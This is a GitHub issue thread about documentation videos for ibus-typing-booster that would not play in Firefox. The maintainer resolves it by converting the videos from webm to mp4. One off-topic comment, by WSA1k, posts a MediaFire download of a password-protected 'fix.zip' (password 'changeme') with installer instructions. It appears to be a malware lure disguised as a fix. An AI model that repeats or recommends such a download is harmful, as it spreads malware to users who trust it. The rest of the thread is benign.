### ISSUE TITLE
[BUG] videos in documentation page not playing

### ISSUE THREAD

**Issue by yotamguttman** [mike-fabian/ibus-typing-booster#528]
https://mike-fabian.github.io/ibus-typing-booster/docs/user/#1

I don't know if the problem is only with me but I cannot play any of the videos on the documentation page.
![image](https://github.com/user-attachments/assets/b06d2812-e143-4f60-a409-a3773fa4afe8)

they'll be loading forever.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mike-fabian** [comment]
The videos play for me, both in firefox and google-chrome.

I have these versions:

```
firefox-129.0-1.fc40.x86_64
google-chrome-stable-128.0.6613.84-1.x86_64
```

I used to have some problems in the past in firefox though, sometimes the videos would not play, it was a bit inconsistent, sometimes it worked when reloading the page. 

All the videos are in "webm" format, I thought maybe firefox has some problems playing "webm" videos.

So I thought: "Maybe I should convert them all to mp4? Maybe that works more reliable in firefox?”

But it  mostly worked, even with webm format. Therefore I hesitated.

But right now, on Fedora 40, with the versions of firefox and google-chrome mentioned above, the videos play without any problems. So maybe this was a but in firefox which has been fixed in the meantime?

**Comment by mike-fabian** [comment]
Which browser are you  using? Which version?

**Comment by yotamguttman** [comment]
your last theory makes most sense to me. maybe Firefox is having a hard time playing webm. I'm using Firefox 129 on Fedora 40. so we have the same versions there for both our browser and OS. I think MP4 (h.264) could be more reliable generally. I see no reason why it should cause any problems

**Comment by mike-fabian** [comment]
I have converted all videos to mp4 now. It seems to help, I actually ran into problems again playing the videos in webm format using firefox on Fedora 40 and converting them to mp4 seemed to help indeed. 

So I am closing this now, please test if it helps for you as well and tell me.

If it doesn’t help, please reopen the issue.

**Comment by mike-fabian** [comment]
@yotamguttman Do the videos play for you now?

**Comment by yotamguttman** [comment]
@mike-fabian all in order!
